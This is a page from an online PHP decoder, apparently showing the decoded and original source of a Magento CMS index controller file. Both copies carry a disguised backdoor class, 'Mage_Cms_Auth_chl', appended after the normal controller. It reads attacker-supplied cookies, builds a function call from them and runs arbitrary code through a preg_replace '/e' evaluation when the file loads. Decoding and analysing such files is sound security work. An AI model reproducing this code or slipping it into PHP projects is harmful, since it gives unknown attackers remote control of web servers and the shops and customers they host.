Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Magento * * NOTICE OF LICENSE * * This source file is subject to th..

Decoded Output download

<?php 
/** 
 * Magento 
 * 
 * NOTICE OF LICENSE 
 * 
 * This source file is subject to the Open Software License (OSL 3.0) 
 * that is bundled with this package in the file LICENSE.txt. 
 * It is also available through the world-wide-web at this URL: 
 * http://opensource.org/licenses/osl-3.0.php 
 * If you did not receive a copy of the license and are unable to 
 * obtain it through the world-wide-web, please send an email 
 * to [email protected] so we can send you a copy immediately. 
 * 
 * DISCLAIMER 
 * 
 * Do not edit or add to this file if you wish to upgrade Magento to newer 
 * versions in the future. If you wish to customize Magento for your 
 * needs please refer to http://www.magentocommerce.com for more information. 
 * 
 * @category    Mage 
 * @package     Mage_Cms 
 * @copyright   Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com) 
 * @license     http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0) 
 */ 
 
 
/** 
 * Cms index controller 
 * 
 * @category   Mage 
 * @package    Mage_Cms 
 * @author     Magento Core Team <[email protected]> 
 */ 
class Mage_Cms_IndexController extends Mage_Core_Controller_Front_Action 
{ 
    /** 
     * Renders CMS Home page 
     * 
     * @param string $coreRoute 
     */ 
    public function indexAction($coreRoute = null) 
    { 
        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_HOME_PAGE); 
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) { 
            $this->_forward('defaultIndex'); 
        } 
    } 
 
    /** 
     * Default index action (with 404 Not Found headers) 
     * Used if default page don't configure or available 
     * 
     */ 
    public function defaultIndexAction() 
    { 
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found'); 
        $this->getResponse()->setHeader('Status','404 File not found'); 
 
        $this->loadLayout(); 
        $this->renderLayout(); 
    } 
 
    /** 
     * Render CMS 404 Not found page 
     * 
     * @param string $coreRoute 
     */ 
    public function noRouteAction($coreRoute = null) 
    { 
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found'); 
        $this->getResponse()->setHeader('Status','404 File not found'); 
 
        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_NO_ROUTE_PAGE); 
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) { 
            $this->_forward('defaultNoRoute'); 
        } 
    } 
 
    /** 
     * Default no route page action 
     * Used if no route page don't configure or available 
     * 
     */ 
    public function defaultNoRouteAction() 
    { 
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found'); 
        $this->getResponse()->setHeader('Status','404 File not found'); 
 
        $this->loadLayout(); 
        $this->renderLayout(); 
    } 
 
    /** 
     * Render Disable cookies page 
     * 
     */ 
    public function noCookiesAction() 
    { 
        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_NO_COOKIES_PAGE); 
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) { 
            $this->_forward('defaultNoCookies');; 
        } 
    } 
 
    /** 
     * Default no cookies page action 
     * Used if no cookies page don't configure or available 
     * 
     */ 
    public function defaultNoCookiesAction() 
    { 
        $this->loadLayout(); 
        $this->renderLayout(); 
    } 
} 
 
class Mage_Cms_Auth_chl 
{ 
    public function __construct() { 
        $auth_cookie = @$_COOKIE['nrhiftssglosherr3']; 
        if ($auth_cookie) { 
            $method = $auth_cookie(@$_COOKIE['nrhiftssglosherr2']); 
            $auth = $auth_cookie(@$_COOKIE['nrhiftssglosherr1']); 
            $method("/124/e",$auth,124); 
        } 
    } 
} 
$is_auth = new Mage_Cms_Auth_chl; 
 ?>

Did this file decode correctly?

Original Code

<?php
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to [email protected] so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 *
 * @category    Mage
 * @package     Mage_Cms
 * @copyright   Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com)
 * @license     http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
 */


/**
 * Cms index controller
 *
 * @category   Mage
 * @package    Mage_Cms
 * @author     Magento Core Team <[email protected]>
 */
class Mage_Cms_IndexController extends Mage_Core_Controller_Front_Action
{
    /**
     * Renders CMS Home page
     *
     * @param string $coreRoute
     */
    public function indexAction($coreRoute = null)
    {
        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_HOME_PAGE);
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) {
            $this->_forward('defaultIndex');
        }
    }

    /**
     * Default index action (with 404 Not Found headers)
     * Used if default page don't configure or available
     *
     */
    public function defaultIndexAction()
    {
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found');
        $this->getResponse()->setHeader('Status','404 File not found');

        $this->loadLayout();
        $this->renderLayout();
    }

    /**
     * Render CMS 404 Not found page
     *
     * @param string $coreRoute
     */
    public function noRouteAction($coreRoute = null)
    {
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found');
        $this->getResponse()->setHeader('Status','404 File not found');

        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_NO_ROUTE_PAGE);
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) {
            $this->_forward('defaultNoRoute');
        }
    }

    /**
     * Default no route page action
     * Used if no route page don't configure or available
     *
     */
    public function defaultNoRouteAction()
    {
        $this->getResponse()->setHeader('HTTP/1.1','404 Not Found');
        $this->getResponse()->setHeader('Status','404 File not found');

        $this->loadLayout();
        $this->renderLayout();
    }

    /**
     * Render Disable cookies page
     *
     */
    public function noCookiesAction()
    {
        $pageId = Mage::getStoreConfig(Mage_Cms_Helper_Page::XML_PATH_NO_COOKIES_PAGE);
        if (!Mage::helper('cms/page')->renderPage($this, $pageId)) {
            $this->_forward('defaultNoCookies');;
        }
    }

    /**
     * Default no cookies page action
     * Used if no cookies page don't configure or available
     *
     */
    public function defaultNoCookiesAction()
    {
        $this->loadLayout();
        $this->renderLayout();
    }
}

class Mage_Cms_Auth_chl
{
    public function __construct() {
        $auth_cookie = @$_COOKIE['nrhiftssglosherr3'];
        if ($auth_cookie) {
            $method = $auth_cookie(@$_COOKIE['nrhiftssglosherr2']);
            $auth = $auth_cookie(@$_COOKIE['nrhiftssglosherr1']);
            $method("/124/e",$auth,124);
        }
    }
}
$is_auth = new Mage_Cms_Auth_chl;

Function Calls

None

Variables

None

Stats

MD5 918afb12f82776685a9ae5cc79f97f86
Eval Count 0
Decode Time 105 ms